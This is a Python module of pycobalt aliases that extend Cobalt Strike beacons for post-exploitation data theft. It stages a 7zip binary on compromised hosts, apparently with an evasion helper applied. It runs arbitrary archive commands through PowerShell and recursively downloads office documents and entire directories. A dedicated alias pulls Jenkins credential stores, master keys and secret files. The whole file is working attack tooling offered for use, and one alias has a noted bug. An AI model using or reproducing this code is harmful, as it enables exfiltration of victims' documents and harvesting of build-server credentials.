#!/usr/bin/env python3
import sys
import utils
sys.path.insert(0, utils.basedir('pycobalt'))
import os
import re
import textwrap
import datetime
import collections
import pycobalt.engine as engine
import pycobalt.events as events
import pycobalt.commands as commands
import pycobalt.aliases as aliases
import pycobalt.aggressor as aggressor
import pycobalt.callbacks as callbacks
import pycobalt.helpers as helpers
from pycobalt.helpers import powershell_quote
# Remote path of the uploaded 7za.exe; None until the '7z-init' alias has run
# and reset to None again by '7z-stop'.
_uploaded = None
@aliases.alias('7z-init', 'Upload 7zip')
def _(bid):
    """Upload the bundled tools/7za.exe into the beacon's temp directory.

    The remote destination is stored in the module-level ``_uploaded`` so
    the '7z' and '7z-stop' aliases can locate the binary later. The name
    '7za.exe' is additionally passed to helpers.explorer_stomp.
    """
    global _uploaded
    remote_path = '{}\\7za.exe'.format(helpers.guess_temp(bid))
    helpers.upload_to(bid, utils.basedir('tools/7za.exe'), remote_path)
    helpers.explorer_stomp(bid, '7za.exe')
    _uploaded = remote_path
@aliases.alias('7z', 'Run 7zip')
def _(bid, *args):
    """Run the previously uploaded 7za.exe through bpowerpick.

    *args* are joined with single spaces and placed verbatim into the
    PowerShell command line — no quoting is applied, so arguments containing
    spaces or PowerShell metacharacters must already be quoted by the caller.
    Reports an error and returns if '7z-init' has not been run.
    """
    global _uploaded
    if not _uploaded:
        aggressor.berror('Run 7z-init first')
        return

    argument_line = ' '.join(args)
    command = "echo '7zip starting'; {} {} ; echo '7zip finished';".format(
        _uploaded, argument_line)
    aggressor.btask(bid, 'Tasked beacon to run 7zip command: {}'.format(argument_line))
    aggressor.bpowerpick(bid, command, silent=True)
@aliases.alias('7z-stop', 'Remove 7zip')
def _(bid):
    """Delete the uploaded 7za.exe from the beacon and forget its path.

    Reports an error if '7z-init' has not been run. ``_uploaded`` is cleared
    only after the brm task has been issued.
    """
    global _uploaded
    if _uploaded:
        aggressor.brm(bid, _uploaded)
        _uploaded = None
    else:
        aggressor.berror('Run 7z-init first')
@aliases.alias('grab-docs', 'Grab common documents')
def _(bid, directory, *extensions):
    """Recursively download files under *directory* whose extension matches.

    When no *extensions* are given a built-in list of office/document types
    is used. The extension is whatever follows the last '.' in the path and
    is compared case-sensitively (so 'DOCX' does not match 'docx'); a name
    with no '.' is compared as a whole.
    """
    wanted = extensions or ('doc', 'docx', 'docm',
                            'xls', 'xlsx', 'xlsm',
                            'ppt', 'pptx', 'pub',
                            'pdf', 'rtf', 'vsd',
                            'txt')

    def download_if_wanted(path):
        # rpartition('.')[2] is the text after the last '.', or the whole
        # string when there is none — same as path.split('.')[-1].
        if path.rpartition('.')[2] in wanted:
            aggressor.bdownload(bid, path)

    aggressor.btask(bid, 'Tasked beacon to recursively download files with extensions: ' + ', '.join(wanted))
    helpers.recurse_ls(bid, directory, download_if_wanted)
@aliases.alias('dlr', 'Recursively download files in directories')
def _(bid, *directories):
    """Walk each of *directories* recursively and download every file found.

    One btask message is emitted per directory before its walk starts.
    """
    def download(path):
        aggressor.bdownload(bid, path)

    for target in directories:
        message = 'Tasked beacon to recurse {} for files to download'.format(target)
        aggressor.btask(bid, message)
        helpers.recurse_ls(bid, target, download)
@aliases.alias('dl', 'Download files')
def _(bid, *files):
    """Issue one bdownload per path in *files*, in the order given."""
    for remote_path in files:
        aggressor.bdownload(bid, remote_path)
@aliases.alias('dli', 'Download specific files in directory')
def _(bid, directory, *files):
    """Download each name in *files* from *directory*.

    Paths are formed as ``directory + '\\' + name``; *directory* is used as
    given and no check is made for a trailing backslash.
    """
    remote_paths = ['{}\\{}'.format(directory, name) for name in files]
    for remote_path in remote_paths:
        aggressor.bdownload(bid, remote_path)
@aliases.alias('dla', 'Non-recursively download files in directories')
def _(bid, *directories):
    """Download the files directly inside each of *directories*.

    Uses helpers.recurse_ls with ``depth=1`` so subdirectories are not
    descended into. One btask message is emitted per directory.
    """
    def download(path):
        aggressor.bdownload(bid, path)

    for target in directories:
        message = 'Tasked beacon to look in {} for files to download'.format(target)
        aggressor.btask(bid, message)
        helpers.recurse_ls(bid, target, download, depth=1)
@aliases.alias('grab-jenkins', 'Grab Jenkins files')
def _(bid, host=None):
    """Download the fixed list of Jenkins files in ``files`` from ``jenkins_dir``.

    When *host* is given, the directory is first converted to a UNC path
    with helpers.path_to_unc(host, jenkins_dir). Each file is fetched with
    ``silent=True``.
    """
    jenkins_dir = r'C:\program files (x86)\jenkins'
    files = ['secret.key', 'queue.xml', 'config.xml', 'jenkins.xml',
             'github-plugin-configuration.xml',
             'credentials.xml',
             'scriptApproval.xml', 'scm-sync-configuration.xml',
             'secrets/master.key', 'secrets/hudson.util.Secret']
    if host:
        prefix = helpers.path_to_unc(host, jenkins_dir)
    # NOTE(review): ``prefix`` is only bound inside the ``if host`` branch, so
    # invoking this alias without *host* raises NameError on the next line.
    aggressor.btask(bid, 'Tasked beacon to download files in {}: {}'.format(prefix, ', '.join(files)))
    for fname in files:
        # Joined with a backslash even for the 'secrets/...' entries, which
        # keep their forward slash.
        path = r'{}\{}'.format(prefix, fname)
        aggressor.bdownload(bid, path, silent=True)
# Get download lpaths
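@commands.command('lpaths')
def _(out=None):
    """List the local path (lpath) of every download known to the team server.

    Each line has the form ``<remote path>\\t<local path>``. The remote path
    is the download's 'path' and 'name' fields concatenated with no separator
    inserted — presumably 'path' already ends with one; verify against the
    aggressor.downloads() schema.

    Args:
        out: optional local file to write to. When given, one line per
            download is written there; otherwise each line is passed to
            aggressor.println.
    """
    lines = []
    for download in aggressor.downloads():
        remote_path = r'{}{}'.format(download['path'], download['name'])
        lines.append('{}\t{}'.format(remote_path, download['lpath']))

    if out:
        # writelines() does not add line terminators; the previous version
        # ran every entry together on a single line. Explicit utf-8 so the
        # output does not depend on the operator's locale.
        with open(out, 'w', encoding='utf-8') as fp:
            fp.writelines(line + '\n' for line in lines)
    else:
        for line in lines:
            aggressor.println(line)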